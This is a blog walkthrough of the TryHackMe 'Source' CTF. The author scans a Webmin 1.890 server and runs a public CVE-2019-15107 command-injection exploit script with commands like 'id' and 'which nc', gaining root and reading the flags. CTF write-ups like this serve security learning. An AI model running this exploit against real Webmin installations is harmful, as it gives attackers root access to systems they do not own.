j.info Cybersecurity Blog

A blog dedicated to learning about cybersecurity, and sharing CTF walkthroughs


Date: March 13th 2022

Author: j.info

Link: Source CTF on TryHackMe

TryHackMe Difficulty Rating: Easy


Initial Enumeration

Nmap Scan

sudo nmap -sV -sC -A -T4

22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

Gobuster Scan

No gobuster scan is required for this CTF.

Website Digging

Visiting the main page:


I do a quick search for webmin exploit and it looks like there is an RCE effecting Webmin <=1.920 under CVE-2019-15107. Since this server is running Webmin version 1.890 we can try this CVE and see if it works for us.

I find a python script for this CVE on github here.

Looking at the script it exploits a command injection vulnerability in the password_change.cgi file. I test it out by running:

python3 webmin-1.890_exploit.py 10000 "which nc"

   ______________    _____   __
  / ___/_  __/   |  /  _/ | / /
  \__ \ / / / /| |  / //  |/ / 
 ___/ // / / ___ |_/ // /|  /  
/____//_/ /_/  |_/___/_/ |_/   

WebMin 1.890-expired-remote-root

<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.

It’s working, we have RCE on the box.

Let’s see which user Webmin is running under:

python3 webmin-1.890_exploit.py 10000 "id"

   ______________    _____   __
  / ___/_  __/   |  /  _/ | / /
  \__ \ / / / /| |  / //  |/ / 
 ___/ // / / ___ |_/ // /|  /  
/____//_/ /_/  |_/___/_/ |_/   

WebMin 1.890-expired-remote-root

<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
uid=0(root) gid=0(root) groups=0(root)

Well, it looks like we’re running as root! We can likely get a reverse shell back at this point since nc was there, but I don’t even think we need to do that since we should just be able to cat the 2 flags using this script.

I run the script with ls /home and see that we have 1 user on the system named dark. Listing files in /home/dark shows us that the user.txt flag is there.

I run the script with cat /home/dark/user.txt and get back the user flag.


I then run the script with cat /root/root.txt and get back the root flag.


And with that we’ve completed this CTF! This was definitely a short one.


A quick run down of what we covered in this CTF:

Many thanks to:

You can visit them at: https://tryhackme.com